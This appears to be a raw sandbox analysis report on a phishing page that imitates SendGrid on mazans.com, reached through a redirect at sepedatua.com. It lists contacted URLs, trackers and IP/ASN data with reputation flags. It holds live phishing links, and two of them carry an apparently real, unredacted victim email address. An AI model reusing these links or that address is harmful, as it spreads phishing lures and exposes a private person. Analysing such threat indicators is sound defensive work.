                                                                                                                      https://heapanalytics.com/h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.comfalse
                                                                                                                        high
                                                                                                                        https://www.redditstatic.com/ads/pixel.jsfalse
                                                                                                                          high
                                                                                                                          https://www.clarity.ms/s/0.7.49/clarity.jsfalse
                                                                                                                            high
                                                                                                                            https://www.facebook.com/tr/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=GETfalse
                                                                                                                              high
                                                                                                                              https://mazans.com/WEB-ID-6672849687924/zerobot?email=Pmendon.ext@goeasy.comfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://w3-reporting-nel.reddit.com/reportsfalse
                                                                                                                                high
                                                                                                                                https://mazans.com/content/dam/sendgrid/core-assets/social/favicon-32x32.pngfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.jsfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=FGETfalse
                                                                                                                                  high
                                                                                                                                  https://secure.quantserve.com/aquant.js?a=p-de_F6qVUp9bugfalse
                                                                                                                                    high
                                                                                                                                    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-47fa670601ba9b5db3afd22023c57f06-lc.min.jsfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://connect.facebook.net/en_US/fbevents.jsfalse
                                                                                                                                      high
                                                                                                                                      https://sepedatua.com/158983/secure-redirect/false
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-65e4613a26158083e3e99e53ac7ff36f-lc.min.jsfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://cdn.segment.com/v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settingsfalse
                                                                                                                                        high
                                                                                                                                        https://sepedatua.com/158983/secure-redirecttrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.facebook.com/tr/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=GETfalse
                                                                                                                                          high
                                                                                                                                          https://alb.reddit.com/rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc=false
                                                                                                                                            high
                                                                                                                                            https://www.google.com/recaptcha/api.js?render=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOsfalse
                                                                                                                                              high
                                                                                                                                              https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=FGETfalse
                                                                                                                                                high
                                                                                                                                                https://connect.facebook.net/en_US/fbds.jsfalse
                                                                                                                                                  high
                                                                                                                                                  https://294-tkb-300.mktoresp.com/webevents/visitWebPage?_mchNc=1731515352683&_mchCn=&_mchId=294-TKB-300&_mchTk=_mch-mazans.com-1731515352683-23262&_mchHo=mazans.com&_mchPo=&_mchRu=%2FWEB-ID-6672849687924%2Fzerobot%2F&_mchPc=https%3A&_mchVr=163&_mchEcid=&_mchHa=&_mchRe=https%3A%2F%2Fsepedatua.com%2F&_mchQp=email%3DEMAIL_REDACTEDfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.segment.com/analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.jsfalse
                                                                                                                                                      high
                                                                                                                                                      https://consent.trustarc.com/log?domain=sendgrid.com&country=us&state=&behavior=implied&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&c=a562&referer=https://mazans.com&language=enfalse
                                                                                                                                                        high
                                                                                                                                                        https://t.contentsquare.net/uxa/8bbf67c487693.jsfalse
                                                                                                                                                          high
                                                                                                                                                          https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://consent.trustarc.com/notice?domain=sendgrid.com&c=teconsent&gtm=1&js=nj&noticeType=bbfalse
                                                                                                                                                            high
                                                                                                                                                            https://cdn.segment.com/analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.jsfalse
                                                                                                                                                              high
                                                                                                                                                              https://consent.trustarc.com/asset/notice.js/v/v1.7-776false
                                                                                                                                                                high
                                                                                                                                                                https://obseu.powerrobotflower.com/monfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirectfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://api.segment.io/v1/pfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.jsfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://secure.adnxs.com/getuidjfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://twilio.tt.omtrdc.net/rest/v1/delivery?client=twilio&sessionId=ead54cbe71824480b6163d2cf14e5e54&version=2.11.4false
                                                                                                                                                                        high
                                                                                                                                                                        https://consent.trustarc.com/get?name=Whitney-Book.otffalse
                                                                                                                                                                          high
                                                                                                                                                                          https://connect.facebook.net/signals/config/1040773425961662?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128false
                                                                                                                                                                            high
                                                                                                                                                                            https://cdn.segment.com/analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.jsfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-91a9f83e57a9c0ac9996388c5a881204-lc.min.cssfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://mazans.com/content/dam/sendgrid/core-assets/social/favicon-96x96.pngfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.clarity.ms/tag/uet/5202129false
                                                                                                                                                                                high
                                                                                                                                                                                https://pixel.quantserve.com/pixel;r=914973261;labels=_fp.event.Page%20not%20found%20%7C%20SendGrid;rf=0;a=p-de_F6qVUp9bug;url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED;ref=https%3A%2F%2Fsepedatua.com%2F;ns=0;ce=1;qjs=1;qv=6cdb9339-20241109062824;dst=1;et=1731515356482;tzo=300;ogl=type.website%2Csite_name.SendGrid%2Curl.https%3A%2F%2Fsendgrid%252Ecom%2Fen-us%2F404%2Ctitle.Page%20not%20found%20%7C%20SendGrid%20%2Cdescription.%2Cimage.https%3A%2F%2Fsendgrid%252Ecom%2Fcontent%2Fdam%2Fsendgrid%2Fcore-assets%2Fsocial%2Fsendgrid-default-og;ses=866c6b77-1f69-4857-b1ec-19e8d7f84073;d=mazans.com;uht=2;fpan=1;fpa=P0-2005580295-1731515356484;pbc=;gdpr=0;mdl=false
                                                                                                                                                                                  high
                                                                                                                                                                                  https://cdn.segment.com/v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/integrationsfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://rules.quantcount.com/rules-p-de_F6qVUp9bug.jsfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://jscloud.net/x/45414/inlinks.jsfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetryfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://cdn.heapanalytics.com/js/heap-1541905715.jsfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://obseu.powerrobotflower.com/tracker/tc_imp.gif?e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46a56a82b9eec47679c796e092818c5871d61eb72bffeb1ba131be20ecca7478c31db6bda508e1547f77303fd1f564c2acf503ed79ffca8328828bf7d8557ec4b7274a7d43169230121e118f58109ac5d6ead83c6771e217dcf965d78c9df014b3545700015a7902c7e7d17c7ab1f28cef2ea2b93e745711b3eb7b4e7c1d965b4cfd908e2529d516b3098e89ae6a231c3daea6dc1345ad0f0c8241f14fe3467a0910678fc86ae668504f745b7980a870d97dd75d66071d2d964d27a8f8fb9b9deb1a00779a972a9dc8f5b4c4dc8ce6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bccd1bcd920a11eca4cdecee1f9eb4b1a2c281fbe3415d21e95b94f4057c8928641bd7605d6d6fea66a87718def6c6628e7cca238bab41d1aa59dc225b332a107d0d9dc7e7da397a50991d478b95bfc4f7823b7e9ac1ea0bf3b7000998c00e2e2abcc88d442ba5269b5e9819e23a9a17d8cd11e6fa77a0c0888cfa303bbb99453ac67fda9facb952d93560040f86695d51b6a05e8aed11c99c99d62da4e3d46974341ac76afe50d123e7807b8a200161172877148c469cc3770cab65c0bbe761888b1cf02b20fe552573c18a845d03b12fe78412c615655508ae312d82afd468d7457ec7d401abdec1edc01f8f1f472814f277265280824c01f82eedfedd3fd090bf5f4f76a3763257479c4212f493ef181193626dc1c8c4128bc6b0cf4530e366ee156057d05c723cc7da0c408bd6ffc4bbf16aa148fa31867e98d155d6e7ae7a6bacd30d&cri=BaOHhi2XtN&ts=2363&cb=1731515355030false
                                                                                                                                                                                              high
                                                                                                                                                                                              https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.jsfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://connect.facebook.net/signals/config/731950963606637?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113false
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://c.contentsquare.net/pageview?ex=&dt=2445&pvt=n&la=en-US&uc=0&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&dr=https%3A%2F%2Fsepedatua.com%2F&dw=1263&dh=44898&ww=1280&wh=907&sw=1280&sh=1024&uu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&sn=1&hd=1731515356&v=32bb33fe4ed6e6973ce6df5d79a84ef3f564da91&pid=84712&pn=1&happid=1541905715&hsid=5313631937644667&huu=6112782573225535&r=521041false
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.jsfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                    https://stats.g.doubleclick.net/g/collectchromecache_353.7.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://support.google.com/recaptcha#6262736chromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://support.google.com/recaptcha/?hl=en#6223828chromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.google.comchromecache_353.7.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.youtube.com/iframe_apichromecache_353.7.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://sendgrid.com/chromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://sendgrid.com/partners/amazon-web-services/chromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://support.google.com/recaptcha/#6175971chromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://consent.trustarc.com/get?name=SurveyorSSm-LightItalic-Pro.otf)chromecache_314.7.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://github.com/microsoft/claritychromecache_345.7.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://support.google.com/recaptchachromecache_384.7.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://cdn.jsinit.directfwd.com/sk-jspark_init.phpchromecache_307.7.dr, chromecache_342.7.dr, chromecache_347.7.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.chromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://sendgrid.com/automated-emailchromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://cct.google/taggy/agent.jschromecache_353.7.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://play.google.com/log?format=json&hasfast=truechromecache_384.7.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://www.twilio.com/en-us/legal/privacy#cookies-and-tracking-technologieschromecache_314.7.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://developers.marketo.com/MunchkinLicense.pdfchromecache_374.7.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://consent.trustarc.com/logchromecache_314.7.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://threads.io/chromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://consent-pref.trustarc.com?type=sendgrid_gdpr_v3&layout=gdprchromecache_314.7.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://www.clarity.ms/tag/uet/chromecache_373.7.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://sendgrid.com/marketing/sendgrid-serviceschromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://consent.trustarc.com/get?name=Whitney-Light.otf)chromecache_314.7.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://cloud.google.com/contactchromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          https://j.6sc.co/6si.min.jschromecache_331.7.drfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://sendgrid.com/?chromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              https://api-js-log.trustarc.com/errorchromecache_314.7.drfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://segment.comchromecache_390.7.dr, chromecache_330.7.drfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  https://www.google.com/recaptcha/api2/chromecache_356.7.dr, chromecache_384.7.dr, chromecache_328.7.drfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    https://assets.adobedtm.com/a62564f453ce/3a3a2543ac65/launch-7021ca0c1852.jschromecache_355.7.drfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0chromecache_407.7.drfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        https://consent.trustarc.com/chromecache_314.7.drfalse
                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                          http://consent.trustarc.com/noticemsg?chromecache_314.7.drfalse
                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                            https://consent.trustarc.com/get?name=Whitney-Medium.otf)chromecache_314.7.drfalse
                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                              https://rum.hlx.pagechromecache_407.7.drfalse
                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_356.7.dr, chromecache_384.7.drfalse
                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                  https://googleads.g.doubleclick.netchromecache_353.7.drfalse
                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                    https://www.google.com/pagead/1p-user-list/923239173/?randomchromecache_380.7.drfalse
                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                      https://consent.trustarc.com/bannermsg?chromecache_314.7.drfalse
                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                        https://app.sendgrid.com/signupchromecache_398.7.dr, chromecache_404.7.drfalse
                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                          91.228.74.166
                                                                                                                                                                                                                                                                                          global.px.quantserve.comUnited Kingdom
                                                                                                                                                                                                                                                                                          27281QUANTCASTUSfalse
                                                                                                                                                                                                                                                                                          18.244.18.112
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          91.228.74.200
                                                                                                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                                                                                                          27281QUANTCASTUSfalse
                                                                                                                                                                                                                                                                                          18.66.102.15
                                                                                                                                                                                                                                                                                          d2fashanjl7d9f.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                          13.107.246.45
                                                                                                                                                                                                                                                                                          s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                          18.66.102.121
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                          151.101.193.140
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                          66.235.152.221
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                          151.101.65.140
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                          104.26.5.39
                                                                                                                                                                                                                                                                                          jscloud.netUnited States
                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                          143.204.98.128
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          18.244.18.115
                                                                                                                                                                                                                                                                                          t.contentsquare.netUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          143.204.98.11
                                                                                                                                                                                                                                                                                          euob.powerrobotflower.comUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          142.250.184.228
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          54.75.69.192
                                                                                                                                                                                                                                                                                          obseu.powerrobotflower.comUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          52.22.214.68
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                          13.225.78.53
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          13.32.27.86
                                                                                                                                                                                                                                                                                          cdn.heapanalytics.comUnited States
                                                                                                                                                                                                                                                                                          7018ATT-INTERNET4USfalse
                                                                                                                                                                                                                                                                                          172.217.18.4
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          157.240.0.35
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                          185.89.210.122
                                                                                                                                                                                                                                                                                          ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                          13.225.78.57
                                                                                                                                                                                                                                                                                          consent.trustarc.comUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                                                                                          66.235.152.156
                                                                                                                                                                                                                                                                                          adobetarget.data.adobedc.netUnited States
                                                                                                                                                                                                                                                                                          15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                          46.137.111.148
                                                                                                                                                                                                                                                                                          c.ba.contentsquare.netIreland
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          103.134.152.12
                                                                                                                                                                                                                                                                                          sepedatua.comSingapore
                                                                                                                                                                                                                                                                                          138608CLOUDHOST-AS-APCloudHostPteLtdSGtrue
                                                                                                                                                                                                                                                                                          142.250.186.100
                                                                                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          99.86.8.175
                                                                                                                                                                                                                                                                                          d296je7bbdd650.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          157.240.253.35
                                                                                                                                                                                                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                          157.240.0.6
